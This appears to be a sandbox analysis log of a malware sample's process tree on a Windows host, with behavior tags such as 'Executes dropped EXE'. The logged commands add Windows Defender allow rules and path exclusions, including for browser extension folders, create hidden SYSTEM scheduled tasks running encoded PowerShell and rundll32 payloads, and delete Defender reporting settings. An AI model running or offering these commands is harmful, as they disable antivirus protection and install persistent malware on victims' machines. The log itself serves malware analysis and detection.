C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\RzsCgqp.exeC:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\RzsCgqp.exe ov /CTsite_idVhq 385121 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2928
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:323⤵PID:2772
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:324⤵PID:4424
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:643⤵PID:3844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:323⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:643⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:323⤵PID:1232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:643⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:323⤵PID:1200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:643⤵PID:4828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:323⤵PID:4488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:643⤵PID:3368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hXJwqLKSgMLJYCVB /t REG_DWORD /d 0 /reg:323⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hXJwqLKSgMLJYCVB /t REG_DWORD /d 0 /reg:643⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ /t REG_DWORD /d 0 /reg:323⤵PID:2052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ /t REG_DWORD /d 0 /reg:643⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UQvARBrwpbLJoyHM /t REG_DWORD /d 0 /reg:323⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UQvARBrwpbLJoyHM /t REG_DWORD /d 0 /reg:643⤵PID:2012
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaQdGCRzk" /SC once /ST 06:17:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaQdGCRzk"2⤵PID:1448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaQdGCRzk"2⤵PID:3148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdrESRlZGEayfzFZZ" /SC once /ST 15:59:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\IwvjcXK.exe\" xT /Qasite_idqKt 385121 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bdrESRlZGEayfzFZZ"2⤵PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3680
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1288
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1396
-
C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\IwvjcXK.exeC:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\IwvjcXK.exe xT /Qasite_idqKt 385121 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqEFPgBHoYySYAkccD"2⤵PID:3064
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2288
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:416
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1052
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kpvgWGyvU\GwUmXr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "unWYiNUJqAlITwd" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "unWYiNUJqAlITwd2" /F /xml "C:\Program Files (x86)\kpvgWGyvU\NXDbdfM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "unWYiNUJqAlITwd"2⤵PID:1444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "unWYiNUJqAlITwd"2⤵PID:4484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CvAfdqtpQkofiq" /F /xml "C:\Program Files (x86)\BjJZYiuqlPgU2\JcNTUXN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XKFRqCCIaTSsN2" /F /xml "C:\ProgramData\hXJwqLKSgMLJYCVB\CUZmUJy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EwxjatFcEcEtOgckL2" /F /xml "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\fLFkUzx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RKCqzJUCMLcMgcDeikF2" /F /xml "C:\Program Files (x86)\wStPwHPBGQsuC\MZlHEES.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jRVNJXEqUfFueAuNO" /SC once /ST 02:12:26 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UQvARBrwpbLJoyHM\gtrdzhFt\xFaWTlB.dll\",#1 /CAsite_idene 385121" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jRVNJXEqUfFueAuNO"2⤵PID:4284
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3724
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1604
-
